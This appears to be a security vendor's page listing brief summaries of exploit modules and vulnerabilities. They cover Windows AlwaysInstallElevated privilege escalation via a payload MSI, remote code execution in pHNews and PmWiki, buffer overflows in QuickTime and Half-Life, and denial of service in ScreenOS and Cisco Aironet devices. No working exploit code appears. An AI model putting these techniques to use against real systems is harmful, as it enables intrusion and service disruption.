This module checks the AlwaysInstallElevated registry keys which dictate if .MSI files should be installed with elevated privileges (NT AUTHORITYSYSTEM). The default MSI file is data/exploits/exec_payload.msi with the WiX source file under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply executes payload.exe within the same folder. The MSI may not execute successfully successive times, but may be able to get around this by regenerating the MSI. MSI can be rebuilt from the source using the WIX tool with the following commands: candle exec_payload.wxs light exec_payload.wixobj
Helper applications that are shipped with IPNetSentryX and IPNetMonitorX can be harnessed by a local attacker to provide for unauthorized network reconnaissance. The attacker can run the RunTCPDump utility with specific parameters to capture network traffic and gather sensitive information.
The pHNews script is vulnerable to remote code execution due to insufficient input validation. An attacker can exploit this vulnerability by manipulating the 'templates_dir' parameter to execute arbitrary code on the target server. This exploit works when register_globals is set to On and magic quotes are turned off. The attacker can specify a command to be executed on the target server.
This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack based overflow occurs when processing a malformed Content-Type header. The module has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.
By modifying system configuration values that control the TCP window size, an attacker may connect to and trigger a denial of service in an appliance that is running a vulnerable version of ScreenOS.
The Half-Life Client is prone to a remotely exploitable buffer overflow vulnerability. The issue occurs in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking, a malicious server may execute arbitrary code on an affected client.
Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload.
Input passed to the 'sr' parameter in 'functional_tests.php' is not properly sanitised before being used to get the contents of a resource. This can be exploited to read arbitrary data from local resources with directory traversal attack.
BRU may not properly parse commandline arguments, potentially leading to at least two vectors of exploitation. It may be possible for local attackers to conduct format string-based attacks as well as buffer overflow-based attacks.
This exploit allows remote attackers to execute arbitrary commands on a target system running PmWiki version 2.1.19 or earlier. It takes advantage of a vulnerability in the Zend_Hash_Del_Key_Or_Index function. The attacker can include malicious code from a remote HTTP site and execute shell commands on the target system.
Services By CQR